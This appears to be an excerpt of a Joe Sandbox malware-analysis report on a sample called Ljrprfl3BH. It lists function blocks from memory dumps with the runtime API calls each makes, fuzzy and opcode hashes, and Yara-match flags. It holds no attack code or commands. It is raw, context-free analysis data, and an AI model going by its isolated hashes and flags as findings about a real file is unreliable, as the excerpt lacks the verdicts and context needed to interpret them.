                                                                            • Instruction Fuzzy Hash: D3213872684204AFDF16DF68DC49FEE77BEEF44B10B26812EE91593180D731E901CA90
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                            • String ID:
                                                                            • API String ID: 1687354797-0
                                                                            • Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                            • Instruction ID: a0dbb2ea22d079fff3d368cc6504168582ffddf68e1da0869908354a4c1e625b
                                                                            • Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                            • Instruction Fuzzy Hash: 09218372C84209AEDF15EBB4E844BDDB7FAAF09325F54402AD004B7181EB759A448F65
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,FDD48D65), ref: 00428DD8
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DE6
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428DFF
                                                                            • SetLastError.KERNEL32(00000000,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,FDD48D65), ref: 00428E51
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                            • Instruction ID: 758f7159784acd0a18ffe6e4d50e04bfafef725c819603ece3ff961fbf0e5b5e
                                                                            • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                            • Instruction Fuzzy Hash: E001F53230A7316EA6242BF57C8966B2744EB0577AB60033FF510902E2EE198C20554D
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,021B9028,021B69B9,021D08F7,00000008,021D0C5C,?,?,?,?,021B3CA2,?,?,0045A064), ref: 021B903F
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 021B904D
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 021B9066
                                                                            • SetLastError.KERNEL32(00000000,?,021B9028,021B69B9,021D08F7,00000008,021D0C5C,?,?,?,?,021B3CA2,?,?,0045A064), ref: 021B90B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                            • Instruction ID: 028be97316caea26afc0bbd7df642685dd8364d3ca953f70152f90932bccc90a
                                                                            • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                            • Instruction Fuzzy Hash: E201F7321897116EA7272BB4AC88AEB2779EF45775B300339EA30851F0EF1288125D99
                                                                            APIs
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404D59
                                                                            • int.LIBCPMT ref: 00404D70
                                                                              • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                              • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                            • std::locale::_Getfacet.LIBCPMT ref: 00404D79
                                                                            • std::_Facet_Register.LIBCPMT ref: 00404DAA
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DC0
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                            • String ID:
                                                                            • API String ID: 2243866535-0
                                                                            • Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                            • Instruction ID: 1dda4c75b92fe2b5e69280e9b804bb78dd99b554210e3ff263920cc003329bbf
                                                                            • Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                            • Instruction Fuzzy Hash: 7A11A3B19001249BCB15EBA0C841AEE77B4AF54319F20053EE912B72D2DB7C9A0587DD
                                                                            APIs
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 02194FC0
                                                                            • int.LIBCPMT ref: 02194FD7
                                                                              • Part of subcall function 0219BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0219BFCA
                                                                              • Part of subcall function 0219BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0219BFE4
                                                                            • std::locale::_Getfacet.LIBCPMT ref: 02194FE0
                                                                            • std::_Facet_Register.LIBCPMT ref: 02195011
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 02195027
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 02195045
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                            • String ID:
                                                                            • API String ID: 2243866535-0
                                                                            • Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                            • Instruction ID: 0d747610d04411fb40532dc9d64ed07ea9bae2fe95f35f8da61cb56f99ed600d
                                                                            • Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                            • Instruction Fuzzy Hash: 8611CE32980229EFCF26EBA4D804BED77B6AF44715F54042AE415BB2D1DB349A05CFD1
                                                                            APIs
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040C190
                                                                            • int.LIBCPMT ref: 0040C1A7
                                                                              • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                              • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                            • std::locale::_Getfacet.LIBCPMT ref: 0040C1B0
                                                                            • std::_Facet_Register.LIBCPMT ref: 0040C1E1
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C1F7
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C215
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                            • String ID:
                                                                            • API String ID: 2243866535-0
                                                                            • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                            • Instruction ID: fd9d6ee1f820b304f7f26aef446794e7afe4742a0815df37dede75514b3fc441
                                                                            • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                            • Instruction Fuzzy Hash: C8117371D00229DBCB14EBA0C885AEE7764AF54315F20453EE411BB2D2DB7C9A05CB99
                                                                            APIs
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004054D9
                                                                            • int.LIBCPMT ref: 004054F0
                                                                              • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                              • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                            • std::locale::_Getfacet.LIBCPMT ref: 004054F9
                                                                            • std::_Facet_Register.LIBCPMT ref: 0040552A
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00405540
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040555E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                            • String ID:
                                                                            • API String ID: 2243866535-0
                                                                            • Opcode ID: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
                                                                            • Instruction ID: af26afd1e9f0003da21f47bd393f770a5ce721ed4ca6619ce042a6dd0fbef1f6
                                                                            • Opcode Fuzzy Hash: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
                                                                            • Instruction Fuzzy Hash: 8711A071900628ABCB10EBA4CC41AAE7770AF54319F60053EE815BB2D2DB7C9E458F9C
                                                                            APIs
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404C1B
                                                                            • int.LIBCPMT ref: 00404C32
                                                                              • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                              • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                            • std::locale::_Getfacet.LIBCPMT ref: 00404C3B
                                                                            • std::_Facet_Register.LIBCPMT ref: 00404C6C
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C82
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                            • String ID:
                                                                            • API String ID: 2243866535-0
                                                                            • Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                            • Instruction ID: 4433383583620685c096cb23b62731a72f637e788ffb24460987deb82302b81b
                                                                            • Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                            • Instruction Fuzzy Hash: FE11C671D001249BCB14EBA0C845AED77B4AF54315F20003EE911B72D2DB7C9D04CB9C
                                                                            APIs
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0219C3F7
                                                                            • int.LIBCPMT ref: 0219C40E
                                                                              • Part of subcall function 0219BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0219BFCA
                                                                              • Part of subcall function 0219BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0219BFE4
                                                                            • std::locale::_Getfacet.LIBCPMT ref: 0219C417
                                                                            • std::_Facet_Register.LIBCPMT ref: 0219C448
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0219C45E
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0219C47C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                            • String ID:
                                                                            • API String ID: 2243866535-0
                                                                            • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                            • Instruction ID: 3993bc84f634ba12ba48ef25a3aea2daabebafd5e07b404d586ddf2bb959282f
                                                                            • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                            • Instruction Fuzzy Hash: 3C11E172980228AFCF14EBA4D840AFD77B6AF49724F10041AE415A72D0DB349A05CFE0
                                                                            APIs
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 02194E82
                                                                            • int.LIBCPMT ref: 02194E99
                                                                              • Part of subcall function 0219BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0219BFCA
                                                                              • Part of subcall function 0219BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0219BFE4
                                                                            • std::locale::_Getfacet.LIBCPMT ref: 02194EA2
                                                                            • std::_Facet_Register.LIBCPMT ref: 02194ED3
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 02194EE9
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 02194F07
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                            • String ID:
                                                                            • API String ID: 2243866535-0
                                                                            • Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                            • Instruction ID: 1e389eb45a09788bf3f9737d49ad46296669c35bb8043299cb3913d52781f7da
                                                                            • Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                            • Instruction Fuzzy Hash: 2411E132980228DFCF25EFA4D840AEE77B6AF04724F24051AE414A72D0DB389A01CF90
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 00404E60
                                                                              • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EAB
                                                                            • __Getcoll.LIBCPMT ref: 00404EBA
                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ECA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                            • String ID: \J@
                                                                            • API String ID: 1836011271-3870157017
                                                                            • Opcode ID: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
                                                                            • Instruction ID: fdee6073741f171039223b21022534e6c74e6b1a9002e69b8caf09e8127dea3b
                                                                            • Opcode Fuzzy Hash: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
                                                                            • Instruction Fuzzy Hash: 1E0169719102099FDB10EFA5C441B9DB7B0FF44319F00803EE145BB6C1DB789544CB99
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002), ref: 0042FEF4
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF07
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000), ref: 0042FF2A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            • Opcode ID: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                                            • Instruction ID: 04c50191246c36c7712c7b2292fbce18726cdb65abb1a7ec348a7059dfc2f8e8
                                                                            • Opcode Fuzzy Hash: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                                            • Instruction Fuzzy Hash: D8F0C831A10218BBDB109F90DD09B9EBFB4EF05B12F510076F805A2290CF795E44CB8C
                                                                            APIs
                                                                            • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE11
                                                                            • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE35
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE48
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                            • String ID: pScheduler
                                                                            • API String ID: 3657713681-923244539
                                                                            • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                            • Instruction ID: eb07aeb186abff06dd5fb113d00e985a326b9016228af1cb3add82d84dc8ee7b
                                                                            • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                            • Instruction Fuzzy Hash: 56F05935A40704A3C714FB05DC92CDEB3799E90718760812FE40663182DB7CAD8AC29D
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog3_catchmake_shared
                                                                            • String ID: MOC$RCC$f)D
                                                                            • API String ID: 3472968176-2775210027
                                                                            • Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                            • Instruction ID: b8b6f1548ab8b2383347dfae1d1b1a5445ec9bd996b4cff4a2ea57d32596c497
                                                                            • Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                            • Instruction Fuzzy Hash: FDF06271580154DFDF1AEF65C4446AC3B75AF1DB00F894091E4449B260CB79AA40DFA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                                            • Instruction ID: 170f1839d68b6508eaaaec35cfa06bac438a8aba58ef65257e70e7e464c4b835
                                                                            • Opcode Fuzzy Hash: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                                            • Instruction Fuzzy Hash: 3B71AF31B00266DBCB21CF95E884ABFBB75EF41360B98426BE81067290DB749D45C7E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                            • Instruction ID: 9a99a45cd7f580355d2a4d6524e26359bb0dd84dc6adefbf44c3df2dd4ea1cd5
                                                                            • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                            • Instruction Fuzzy Hash: 1471B6719482169FCB268F54CC84AFFBB75FF45318F544229EC51A7990D7708B81CBA2
                                                                            APIs
                                                                              • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                            • _free.LIBCMT ref: 00430B3F
                                                                            • _free.LIBCMT ref: 00430B56
                                                                            • _free.LIBCMT ref: 00430B75
                                                                            • _free.LIBCMT ref: 00430B90
                                                                            • _free.LIBCMT ref: 00430BA7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free$AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 3033488037-0
                                                                            • Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                            • Instruction ID: 2fc0cbae349d2941fff749f5b49d8ba5872ca9652a97fa93675838e70d9d8155
                                                                            • Opcode Fuzzy Hash: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                            • Instruction Fuzzy Hash: 3F51D131A00304AFEB219F69D851B6BB7F4EF5C724F14566EE809D7251E739E901CB88
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 3033488037-0
                                                                            • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                            • Instruction ID: a23d5940bc6aa653126421550b76a8a4fd6c19e9a70529b9ab2cae044fb4eb9f
                                                                            • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                            • Instruction Fuzzy Hash: BE51B379A80304EFDB21DF69D841B6AB7F5EF68724B24456DE809D7250E732EA01CB90
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                            • Instruction ID: 2c394445bd20a04972dd2082f140732d1460e75e39bee70d4e52ced8c5000be3
                                                                            • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                            • Instruction Fuzzy Hash: 7A41C432A00304ABCB10DF78C981A5EB7E5EF89714F15456AE616EB391DB35ED01CB88
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                            • Instruction ID: 07ee7c82210f1f3dd28615f9df14cabdcd6338bfa9137191b595c31ea9a4f7b4
                                                                            • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                            • Instruction Fuzzy Hash: 8E41B03AA80314AFCB14DF78C880BADB7A6EF89714B2545ADD519EB381D731E901CB80
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0EA,00000000,00000000,0042D928,?,0042D928,?,00000001,0042D0EA,23E85006,00000001,0042D928,0042D928), ref: 004368DA
                                                                            • __alloca_probe_16.LIBCMT ref: 00436912
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436963
                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436975
                                                                            • __freea.LIBCMT ref: 0043697E
                                                                              • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                            • String ID:
                                                                            • API String ID: 313313983-0
                                                                            • Opcode ID: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                            • Instruction ID: d963c907df35f4e1b8a381e23a898db453a996a2d0481b790983a8c47d787b2f
                                                                            • Opcode Fuzzy Hash: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                            • Instruction Fuzzy Hash: 5F31F072A0021AABDF259F65DC41EAF7BA5EF44710F15422AFC04D7290EB39CD54CB94
                                                                            APIs
                                                                            • _SpinWait.LIBCONCRT ref: 0041AEDB
                                                                              • Part of subcall function 00410F11: _SpinWait.LIBCONCRT ref: 00410F29
                                                                            • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEEF
                                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF21
                                                                            • List.LIBCMT ref: 0041AFA4
                                                                            • List.LIBCMT ref: 0041AFB3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                            • String ID:
                                                                            • API String ID: 3281396844-0
                                                                            • Opcode ID: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
                                                                            • Instruction ID: 8a1b27d7ac99c42c423c038c6da62c4f09041a57878ada6c0d5966c490a343f4
                                                                            • Opcode Fuzzy Hash: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
                                                                            • Instruction Fuzzy Hash: 76318B71A02719DFCB10EFA5D5915EEB7B1BF04308F04006FE80167242DB796DA5CB9A
                                                                            APIs
                                                                            • _SpinWait.LIBCONCRT ref: 021AB142
                                                                              • Part of subcall function 021A1178: _SpinWait.LIBCONCRT ref: 021A1190
